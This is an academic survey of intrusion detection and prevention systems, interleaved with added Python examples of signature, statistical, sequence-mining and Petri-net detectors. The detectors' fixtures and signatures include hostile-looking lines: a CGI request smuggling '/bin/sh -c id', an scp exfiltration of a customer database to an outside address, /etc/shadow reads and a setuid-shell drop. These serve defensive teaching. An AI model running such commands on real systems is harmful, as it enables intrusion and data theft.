Intrusion Detection and Prevention System: Challenges & Opportunities

Uzair Bashir
Department of Computer Sciences
Mewar University
Chittorgarh, Rajasthan, India
ub.cs@uok.edu.in

Manzoor Chachoo
Research Supervisor
Mewar University
Chittorgarh, Rajasthan, India
c.manzoor@yahoo.com

Abstract - The drive to make everything readily and universally available has revolutionized networking. In spite of the tremendous growth of networking and information technology, we are still poor at protecting our resources from theft and attack. This may not concern small organizations, but it is a serious issue for industry and for national security. Organizations face an increasing number of threats every day in the form of viruses, intrusions and the like. Although organizations have adopted many different mechanisms, in the form of intrusion detection and prevention systems, to protect themselves from such attacks, many security breaches still go undetected. To understand the security risks and the role of an intrusion detection and prevention system (IDPS), we first survey the common security breaches and then discuss the opportunities and challenges in this field. This paper surveys the overall progress of intrusion detection systems: the existing types, techniques and architectures of intrusion detection systems in the literature. Finally, we outline the present research challenges and issues.

Keywords—Architecture, Attack, Detection, IDS, Prevention, Security, System, Virus.

I. INTRODUCTION

The growth of the Internet has no doubt changed the face of the world, but it has also exposed various security areas that need to be addressed in order to provide a trustworthy environment for those who are part of this system and those who wish to be [16]. Intrusion detection systems (IDS) have come as a savior, but every day new attacks and intrusions challenge even the most powerful tools available. This paper does not provide a method for dealing with new attacks; it explains the current techniques and their approaches to dealing with attacks, and the issues and challenges that current IDSs face.

The paper is organized as follows: Section II describes the intrusion detection system, Section III its general architecture, Section IV the types of IDS, Section V the techniques that IDSs use to detect intrusions, Section VI future developments, and Section VII concludes.

II. OVERVIEW OF IDS

An intrusion detection system (IDS) is a software application or a hardware appliance that continuously monitors network traffic and/or system activity for abnormal behavior or policy violations and reports it, as logs or alerts, to an administration unit. The extensive use of the Internet connects a host or network to every other computer and network on the globe, exposing it to every possible intrusion [17]. An IDS dynamically monitors and observes the target system (which can be a file, a folder, a host or a network) for misuse and handles abnormal behavior either by itself or by raising alarms to an administrative unit.

An IDS is necessary because building a completely secure system is next to impossible. The target system is typically threatened by two kinds of users [18]:

Legitimate users: users who are part of the system but go beyond the scope of what they are trusted to do.
Illegitimate users: users who are unknown to the system but try to breach its security.

Protecting a system against outsiders may seem easy, but a large number of users also dwell within the boundaries of the target system. An IDS generates logs which record the activities and events in the target system. A legitimate user with privileges similar to root or the system administrator can work at a level below the one at which the audit trail is collected, and so bypass the monitoring scheme. Hence the target system is more susceptible to an intrusion by one of its own members. There are countermeasures for this as well, but it illustrates a loophole in a target system that remains even when it is protected from illegitimate users.

III. GENERAL ARCHITECTURE OF AN IDS

A panoramic view of an IDS reveals a security system that monitors a target system continuously and produces audit trails. These audit trails contain processed data generated from the information coming from the target system [1]. The audit trails can then be inspected automatically by tools, either online or offline, and/or used by a manual authority (an administrator) who analyzes the logs more closely [19]. The general architecture of an IDS is

978-93-80544-12-0/14/$31.00 ©2014 IEEE 806
shown in Figure 1. The location of an IDS is a significant issue and depends on factors such as the required security level, the budget and the environment. Generally, an IDS is placed either at the network entry/exit points or on the hosts themselves, or sometimes a combination of both.

The job of an IDPS is to monitor the data, analyze it and accordingly prevent intrusions. Abnormal behavior detected by an IDPS can be dealt with automatically or by raising alarms to a manned station. An IDPS distinguishes between normal and abnormal behavior on the basis of previous knowledge or of policies already defined in its database.

Fig. 1: General Architecture of an IDS [1]

IV. TYPES OF IDS

As already mentioned, there are various types of IDS depending on their location, and the choice among them depends mostly on resources, budget and other factors. An IDS monitors a target system which can be a network, a host, etc. According to this classification there are two types of IDS: network-based intrusion detection systems (NIDS) and host-based intrusion detection systems (HIDS). Because of higher security demands, hybrid systems that combine the features of both NIDS and HIDS are now used as well.

A. Network-Based Intrusion Detection Systems

A NIDS works at the network level by analyzing the packets travelling back and forth in a network. It is clearly separated from the network firewall and can be thought of as a second line of defense. A NIDS works in stealth mode, passively sniffing the segment without an address of its own, which makes it harder for an attacker to notice and evade and therefore more effective. A NIDS can sniff large amounts of data and, if it finds abnormal activity, raise an alarm; when deployed inline as a prevention system it can also block all traffic related to the affected service.

B. Host-Based Intrusion Detection Systems

A HIDS analyzes data, file-system modifications, application logs, etc. on individual hosts, or at least on the hosts that fall under the security requirements. Recent developments in HIDS include monitoring the system calls made to the operating system kernel [2]. A HIDS is part of the system on which it is installed, so if the security of a particular host is compromised, its HIDS is affected as well.

C. Hybrid Intrusion Detection Systems

The introduction of distributed environments has exposed various security issues that had remained unaddressed before, and this has called for a higher degree of defense. A hybrid system works as an integration of network-based and host-based systems.

V. INTRUSION DETECTION TECHNIQUES

IDSs are classified on various characteristics such as behavior, cognizance, etc. There are two main methods of detection: anomaly based and signature based. In an anomaly-based technique a set of rules/activities describing normal behavior is pre-defined (or learned) for a user or a system. This model was originally proposed by Denning [3], and since then extensive work has been done to enhance the technique. Anything that does not fit the description of normal behavior is considered an anomaly and therefore needs attention. The IDS continuously monitors the traffic looking for abnormal behavior and marks everything abnormal as suspicious [4]. This method is robust against most intrusions, including previously unseen ones, but the problem lies in defining the boundary between normal and abnormal behavior within a system. The rate of false alarms is high, and the rules/activities must be redefined whenever a user's privileges change. Methods that employ anomaly-based detection include statistical models, neural networks and data-mining based methods.

A signature-based technique, on the other hand, has a database of already known attacks and uses this knowledge to deal with intrusions. This technique is also called misuse detection and is considered powerful against known attacks and those that behave similarly to the ones already defined. It lacks, however, the ability to catch new intrusions. Signature-based methods include rule-based systems, expert systems, genetic algorithms, pattern matching, state-transition analysis and signature analysis.

A. Statistical Models

This is the most widely used method for detecting intrusions. Statistical techniques try to differentiate between normal and abnormal behavior on the basis of parameters collected over time, for example bandwidth, CPU utilization and user session time. The collected parameters are used to build profiles of individual users and activities. If the values of these parameters go beyond what has been learned as normal for the entity, an intrusion is flagged. NIDES and Haystack are systems based on statistical models. Statistical models are the earliest of the anomaly models, but later implementations running in distributed environments keep them competitive.
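Section V and subsection A describe the two detection philosophies in prose. The following Python program is an added example, not code from the paper or from any of the products it cites: it runs a signature matcher and a Denning-style statistical profile detector side by side over a constructed audit trail, so that the complementary blind spots described above (the signature database misses the novel attack, the anomaly detector misses the known attack under normal load and raises a false alarm on a new user) show up in the output. The signatures, the user names, the per-session metrics (session minutes, CPU percent, bytes out) and the event strings are all made up for the example; the 3-sigma threshold is an assumption.

```python
"""Signature (misuse) detection beside anomaly (statistical profile) detection.

Added example: the audit records, users and signatures below are constructed
for illustration; they are not data or code from the paper.
"""
import re
import statistics
from collections import defaultdict
from typing import Optional

# --- Signature based: a database of patterns describing known attacks -------
# Illustrative signatures only; a real IDS carries thousands of them.
SIGNATURES = {
    "cgi-shell-injection": re.compile(r"GET /cgi-bin/\S*[;|]\s*/bin/sh"),
    "shadow-file-read":    re.compile(r'open\("/etc/shadow"'),
    "setuid-shell":        re.compile(r"chmod\s+[4-7]\d{3}\s+\S*sh\b"),
}

def signature_match(event: str) -> Optional[str]:
    """Name of the first known-attack signature the event matches, else None."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(event):
            return name
    return None

# --- Anomaly based: per-user statistical profiles (Denning's model [3]) -----
class UserProfile:
    """Learns mean and standard deviation of each metric per user; at detection
    time a value more than k standard deviations from the mean is anomalous."""

    def __init__(self, k: float = 3.0):
        self.k = k
        self._samples = defaultdict(lambda: defaultdict(list))  # user -> metric -> values
        self.stats = {}                                         # user -> metric -> (mean, sd)

    def learn(self, user: str, metrics: dict) -> None:
        for name, value in metrics.items():
            self._samples[user][name].append(value)

    def finalize(self) -> None:
        """Freeze the profiles at the end of the training period."""
        for user, per_metric in self._samples.items():
            self.stats[user] = {m: (statistics.mean(v), statistics.pstdev(v))
                                for m, v in per_metric.items()}

    def anomalies(self, user: str, metrics: dict) -> set:
        """Metrics deviating beyond k sigma; a user without a profile is itself an anomaly."""
        if user not in self.stats:
            return {"unknown-user"}
        flagged = set()
        for name, value in metrics.items():
            if name not in self.stats[user]:
                continue
            mean, sd = self.stats[user][name]
            sd = sd or 1e-9   # metric was constant in training: any change is a deviation
            if abs(value - mean) / sd > self.k:
                flagged.add(name)
        return flagged

# Constructed "normal" audit records used to train the profiles: (user, metrics)
TRAINING = [
    ("alice", {"session_min": 30, "cpu_pct": 3, "bytes_out": 1000}),
    ("alice", {"session_min": 35, "cpu_pct": 4, "bytes_out": 1500}),
    ("alice", {"session_min": 40, "cpu_pct": 5, "bytes_out": 1200}),
    ("alice", {"session_min": 45, "cpu_pct": 6, "bytes_out": 1300}),
    ("alice", {"session_min": 38, "cpu_pct": 4, "bytes_out": 1100}),
    ("bob",   {"session_min": 120, "cpu_pct": 40, "bytes_out": 20000}),
    ("bob",   {"session_min": 110, "cpu_pct": 35, "bytes_out": 22000}),
    ("bob",   {"session_min": 130, "cpu_pct": 45, "bytes_out": 18000}),
    ("bob",   {"session_min": 125, "cpu_pct": 42, "bytes_out": 21000}),
]

# Constructed records to analyse: (user, audit event text, metrics for that session)
EVENTS = [
    ("bob",   "GET /cgi-bin/phf?Qalias=x;/bin/sh -c id",
              {"session_min": 118, "cpu_pct": 41, "bytes_out": 19500}),  # known attack, normal load
    ("alice", "scp /var/db/customers.sqlite 203.0.113.9:/tmp",
              {"session_min": 40, "cpu_pct": 5, "bytes_out": 50000}),    # no signature, huge egress
    ("carol", "login tty1",
              {"session_min": 20, "cpu_pct": 2, "bytes_out": 500}),      # new user: false alarm
    ("alice", "vim /home/alice/notes.txt",
              {"session_min": 42, "cpu_pct": 4, "bytes_out": 1250}),     # benign
]

def build_profile(training) -> UserProfile:
    profile = UserProfile(k=3.0)
    for user, metrics in training:
        profile.learn(user, metrics)
    profile.finalize()
    return profile

def analyze(profile: UserProfile, events) -> list:
    """Run both detectors over the events and return one verdict per event."""
    return [{"user": user,
             "signature": signature_match(text),
             "anomalies": profile.anomalies(user, metrics)}
            for user, text, metrics in events]

if __name__ == "__main__":
    for verdict in analyze(build_profile(TRAINING), EVENTS):
        print(verdict)
```

The first event is caught only by the signature database, the second only by the profile (egress is hundreds of standard deviations above alice's mean), the third is the false alarm the text warns about (a legitimate new user with no profile), and the fourth is clean under both. Whenever a user's role changes, the profile has to be retrained, which is the "redefinition of rules" cost mentioned above.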

2014 International Conference on Computing for Sustainable Global Development (INDIACom) 807
B. Data Mining Based Methods

The strength of an IDS is improved by periodically updating its rules and data through an expert system. This process is manual and therefore time consuming, and system builders rely on their intuition and experience to select the statistical measures used for anomaly detection [11]. These drawbacks have led to methods that feed the IDS with new sets of rules and data that are learned automatically. Data-mining based methods use the audit data to extract patterns from activities and user behavior and then use these patterns to identify anomalies in the system. The facts collected from the audit data are used to learn the behavior of events and activities gradually; the learning process is inductive and follows a data-centric approach. It is assumed that both legitimate and illegitimate activity leave their footprints in the audit data [10].

C. Signature Analysis

This method behaves like the basic misuse detection technique and looks for patterns of data in the audit trails. It is very similar to knowledge-based systems, but the complexity regarding the semantics of attacks found in expert systems is very low in this technique. As a result, most commercial IDS products use it [7, 8, 9].

D. Rule Based Systems

Systems that employ rule-based techniques have a set of predefined rules and an expert system that looks for any signs of intrusion. The rules are developed over time, for example by monitoring a network connection and its behavior. Rules generated in this manner are then combined to form a knowledge base for the IDS. During the analysis of the audit trails, any activity that is found to deviate from the normal track is fed to the expert system, which decides how to deal with the intrusion [13]. These methods serve as support systems for an IDS, with additional services offered by expert systems. IDES and NADIR are examples of rule-based systems.

E. Genetic Algorithms

This method is modeled on biological evolution. Through continuous monitoring it evolves a population of data structures called chromosomes, each of which represents a candidate solution to the problem, here a detection rule [5]. These are machine-learning techniques known as evolutionary algorithms or evolutionary computation [12]. Eventually, rules are generated which judge whether activity is an intrusion and what the countermeasure is: if the condition of a rule is met, a set of predefined actions is performed. Because whole populations of candidate rules must be evaluated in every generation, the approach has a high resource utilization.

F. State Transition Based

This method uses finite state theory as the basis for detecting intrusions. The states of the network or host are modeled as the states of a finite state machine, and audit events drive the transitions; if the machine is driven from its initial state into a compromised state, an intrusion is detected [2]. The method represents the intermediate steps of a penetration as states that must be passed through for the intrusion to succeed, and the graphical (state-diagram) representation makes it easier to derive the intrusion from the intermediate states that must take place for its successful completion [13]. Besides the initial and compromised states, there are signature actions: the actions which, if omitted from the sequence, would prevent the intrusion from succeeding.

G. Expert Based Systems

In the early days, the audit data produced by an IDS was forwarded to a human administrator who analyzed the long log files, checking for suspicious activity. The disadvantage of this method was the time-consuming and exhaustive study of audit trails. Expert systems instead maintain human-like knowledge and reasoning as a knowledge base [2], and this is what knowledge-based IDS techniques use [6]. In addition to the knowledge base there is a set of rules and heuristics that is applied to it to trap intrusions, if any.

H. Petri Nets

These are knowledge-based systems that use mathematical models to represent the states of a system graphically. A knowledge-based Petri net model, IDIOT [9], which uses Colored Petri nets, was developed at Purdue University. The vertices of the graph represent the system states, and the transition from one state to another is marked by events. Three conditions must be satisfied: pre-conditions, which identify the actions that must occur before the pattern matches; post-actions, which define the actions taken after the pattern matches; and invariants, which are the conditions that must hold throughout the process of pattern matching.

VI. FUTURE DEVELOPMENTS IN IDS TECHNIQUES

The successful growth of artificial intelligence has posed the great challenge of incorporating this new field into intrusion detection systems. Presently held back by the novelty of its implementation [14], it is going to be a major contribution to IDS methodology. Four areas of application of AI in IDS are discussed in [15].

The use of neural networks can also be effective in IDS. Their capability to process huge amounts of data and derive meaning and patterns [15] from it can be applied to find attacks. Such a system keeps on learning gradually, keeping track of previous penetrations and analyzing data for newer ones.
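As an added illustration of the data-mining approach in subsection B (not code from the paper or from [10], which mined audit and connection records with classification and frequent-episode algorithms), the following Python program learns its detection rules from audit data instead of from an analyst: it mines the fixed-length windows of system-call sequences observed during a training period, turns them into "after this context, expect one of these calls" rules, and scores new traces by the fraction of windows never seen before. The traces, the window length and the alert threshold are constructed assumptions for the example.

```python
"""Mining normal-behaviour patterns from audit data instead of hand-writing them.

Added example. The system-call traces are constructed for illustration; the
technique (fixed-length windows over audit sequences) is one simple instance of
learning detection rules from data rather than from an expert.
"""
from collections import defaultdict

def windows(trace, n):
    """All consecutive length-n windows of a trace (empty if the trace is shorter than n)."""
    return [tuple(trace[i:i + n]) for i in range(len(trace) - n + 1)]

class MinedSequenceModel:
    def __init__(self, n=3):
        self.n = n
        self.known = set()                    # windows observed in normal traces
        self.successors = defaultdict(set)    # (n-1)-context -> calls seen to follow it

    def train(self, traces):
        """Mine the pattern database from audit traces collected during normal operation."""
        for trace in traces:
            for w in windows(trace, self.n):
                self.known.add(w)
                self.successors[w[:-1]].add(w[-1])

    def rules(self):
        """The learned rules in readable form: context -> sorted list of allowed next calls."""
        return {" ".join(ctx): sorted(nxt) for ctx, nxt in self.successors.items()}

    def score(self, trace):
        """Fraction of windows in the trace never seen in training (0.0 = entirely normal)."""
        ws = windows(trace, self.n)
        if not ws:
            return 0.0
        return sum(1 for w in ws if w not in self.known) / len(ws)

    def is_intrusion(self, trace, threshold=0.25):
        return self.score(trace) > threshold

# Constructed traces of a small file/network server during normal operation.
NORMAL_TRACES = [
    ["open", "read", "write", "close"],
    ["open", "read", "read", "write", "close"],
    ["socket", "bind", "listen", "accept", "read", "write", "close"],
    ["accept", "read", "open", "read", "write", "close"],
]

def demo():
    """Score three constructed traces against the mined model."""
    model = MinedSequenceModel(n=3)
    model.train(NORMAL_TRACES)
    return {
        "benign":    model.score(["accept", "read", "write", "close"]),
        "partial":   model.score(["accept", "read", "write", "execve"]),
        "shellcode": model.score(["accept", "read", "execve", "setuid", "socket", "connect"]),
    }

if __name__ == "__main__":
    m = MinedSequenceModel()
    m.train(NORMAL_TRACES)
    for ctx, nxt in sorted(m.rules().items()):
        print(f"after [{ctx}] expect one of {nxt}")
    print(demo())
```

The point the text makes, that the rules are induced from the data rather than chosen by intuition, is visible in `rules()`: nobody wrote "after accept read expect open or write", the model derived it from the traces. The same data-centric assumption is also the weakness: anything absent from the training period, including legitimate behaviour that simply did not occur then, scores as an anomaly.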

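Subsections F and H describe state-transition analysis and the Colored Petri nets of IDIOT in prose. The following Python program is an added example, not code from [9] or [13]: it implements a small pattern net in that spirit, with a source place that starts a fresh partial match on every matching event, tokens that carry variable bindings (the "colour"), a pre-condition (guard) and post-action (bind) on every transition, and an invariant that discards a partial match as soon as it is violated. With a single token and no bindings it reduces to the state-transition diagram of subsection F. The setuid-shell scenario, the event field names and the audit events are constructed for the example.

```python
"""A Colored-Petri-net style pattern matcher over an audit trail.

Added example in the spirit of IDIOT [9] and state-transition analysis [13];
the pattern, the audit events and the field names are constructed.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Tuple

Event = Dict[str, object]
Binding = Dict[str, object]

@dataclass
class Transition:
    event_type: str                                 # only events of this type can fire it
    guard: Callable[[Event, Binding], bool]         # pre-condition on event and current bindings
    bind: Callable[[Event, Binding], Binding]       # post-action: variables added to the token

@dataclass
class PatternNet:
    name: str
    transitions: List[Transition]                   # place i -> place i+1 via transitions[i]
    invariant: Callable[[Event, Binding], bool]     # must hold for a partial match to survive
    tokens: List[Tuple[int, Binding]] = field(default_factory=list)   # live partial matches

    def feed(self, ev: Event) -> List[Binding]:
        """Advance the net by one audit event; return bindings of completed matches."""
        alerts, survivors = [], []
        # 1. invariant: a partial match whose invariant is violated is discarded
        live = [(p, b) for p, b in self.tokens if self.invariant(ev, b)]
        # 2. try to fire the next transition of every live token (firing consumes it)
        for place, binding in live:
            t = self.transitions[place]
            if ev["type"] == t.event_type and t.guard(ev, binding):
                nb = {**binding, **t.bind(ev, binding)}
                if place + 1 == len(self.transitions):
                    alerts.append(nb)               # final place reached: compromised state
                else:
                    survivors.append((place + 1, nb))
            else:
                survivors.append((place, binding))
        # 3. the source place always holds a token, so a new instance can start on any event
        t0 = self.transitions[0]
        if ev["type"] == t0.event_type and t0.guard(ev, {}):
            nb = t0.bind(ev, {})
            if len(self.transitions) == 1:
                alerts.append(nb)
            else:
                survivors.append((1, nb))
        self.tokens = survivors
        return alerts

def run(net: PatternNet, events: List[Event]) -> List[Binding]:
    """Feed a whole audit trail through the net and collect every completed match."""
    return [b for ev in events for b in net.feed(ev)]

# Constructed pattern: copy a shell to X, make X setuid, then someone else executes X.
def setuid_shell_net() -> PatternNet:
    return PatternNet(
        name="setuid-shell-drop",
        transitions=[
            Transition("cp",
                       lambda e, b: e["src"] in ("/bin/sh", "/bin/bash"),
                       lambda e, b: {"X": e["dst"], "owner": e["user"]}),
            Transition("chmod",
                       lambda e, b: e["file"] == b["X"] and bool(e["mode"] & 0o4000),
                       lambda e, b: {}),
            Transition("exec",
                       lambda e, b: e["file"] == b["X"] and e["user"] != b["owner"],
                       lambda e, b: {"victim": e["user"]}),
        ],
        # invariant: X must still exist; unlinking it aborts that partial match
        invariant=lambda e, b: not (e["type"] == "unlink" and e.get("file") == b.get("X")),
    )

# Constructed audit trail with two interleaved candidate instances of the pattern.
AUDIT = [
    {"type": "cp",     "user": "mallory", "src": "/bin/sh", "dst": "/tmp/.x"},
    {"type": "cp",     "user": "alice",   "src": "/bin/sh", "dst": "/home/alice/sh"},
    {"type": "unlink", "user": "alice",   "file": "/home/alice/sh"},          # alice's match dies
    {"type": "chmod",  "user": "mallory", "file": "/tmp/.x",    "mode": 0o4755},
    {"type": "chmod",  "user": "mallory", "file": "/tmp/other", "mode": 0o4755},  # not X
    {"type": "exec",   "user": "mallory", "file": "/tmp/.x"},                  # owner: guard fails
    {"type": "exec",   "user": "bob",     "file": "/tmp/.x"},                  # victim: alert
]

if __name__ == "__main__":
    for alert in run(setuid_shell_net(), AUDIT):
        print("INTRUSION", alert)
```

The binding is what a plain finite state machine cannot express: the chmod and exec steps must refer to the same file X that the cp step bound, and two candidate attacks (mallory's and alice's) are tracked at once by two tokens. The unlink is a signature action in the sense of subsection F: once it happens, alice's sequence can no longer complete, and the invariant removes that token rather than letting it linger.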
VII. CONCLUSION

This survey paper describes a number of intrusion detection approaches built on the two basic techniques, anomaly detection and signature detection. Some approaches work better in one environment but prove weak in others. A generic technique needs to be developed that can help secure our networks in any environment. This requires detailed knowledge of the existing techniques and their loopholes, so that researchers can propose ideas to overcome the weaknesses and develop a much stronger approach to dealing with intrusions.
REFERENCES

[1] Debar, Hervé, Marc Dacier, and Andreas Wespi. "Towards a taxonomy of intrusion-detection systems." Computer Networks 31.8 (1999): 805-822.
[2] Sonawane, Sandip, Ganesh Prasad, and Shailendra Pardeshi. "A survey on intrusion detection techniques." World Journal of Science and Technology 2.3 (2012).
[3] Denning, Dorothy E. "An intrusion-detection model." IEEE Transactions on Software Engineering SE-13.2 (1987): 222-232.
[4] Axelsson, Stefan. Intrusion Detection Systems: A Survey and Taxonomy. Technical Report 99-15, Chalmers University of Technology, 2000.
[5] Li, Wei. "Using genetic algorithm for network intrusion detection." Proceedings of the United States Department of Energy Cyber Security Group (2004): 1-8.
[6] Lunt, Teresa F., and R. Jagannathan. "A prototype real-time intrusion-detection expert system." Proceedings of the 1988 IEEE Symposium on Security and Privacy. IEEE, 1988.
[7] Haystack Labs, Inc. Stalker. http://www.haystack.com/stalk.htm, 1997.
[8] Internet Security Systems, Inc. RealSecure. http://www.iss.net/prod/rsds.html, 1997.
[9] Kumar, Sandeep, and Eugene H. Spafford. "A pattern matching model for misuse intrusion detection." Proceedings of the 17th National Computer Security Conference, 1994.
[10] Lee, Wenke, Salvatore J. Stolfo, and Kui W. Mok. "Mining audit data to build intrusion detection models." Proceedings of KDD-98, 1998.
[11] Lunt, Teresa F. "Detecting intruders in computer systems." Proceedings of the 1993 Conference on Auditing and Computer Technology, 1993.
[12] Helman, Paul, and Gunar Liepins. "Statistical foundations of audit trail analysis for the detection of computer misuse." IEEE Transactions on Software Engineering 19.9 (1993): 886-901.
[13] Ilgun, Koral, Richard A. Kemmerer, and Phillip A. Porras. "State transition analysis: A rule-based intrusion detection approach." IEEE Transactions on Software Engineering 21.3 (1995): 181-199.
[14] Frank, Jeremy. "Artificial intelligence and intrusion detection: Current and future directions." Proceedings of the 17th National Computer Security Conference, 1994.
[15] Cannady, James, and Jay Harrell. "A comparative analysis of current intrusion detection technologies." Proceedings of the Fourth Technology for Information Security Conference, 1996.
[16] Beigh, Bilal Maqbool, and M. A. Peer. "Intrusion Detection and Prevention System: Classification and Quick." 2011.
[17] Mir, Suhail Qadir, S. M. K. Mehraj-ud-din Dar, and Bilal Maqbool Beig. "Information availability: Components, threats and protection mechanisms." Journal of Global Research in Computer Science 2.3 (2011).
[18] Williamson, Matthew M. "Resilient infrastructure for network security." Complexity 9.2 (2003): 34-40.
[19] Karlzén, Henrik. "An analysis of security information and event management systems: The use of SIEMs for log collection, management and analysis." 2009.
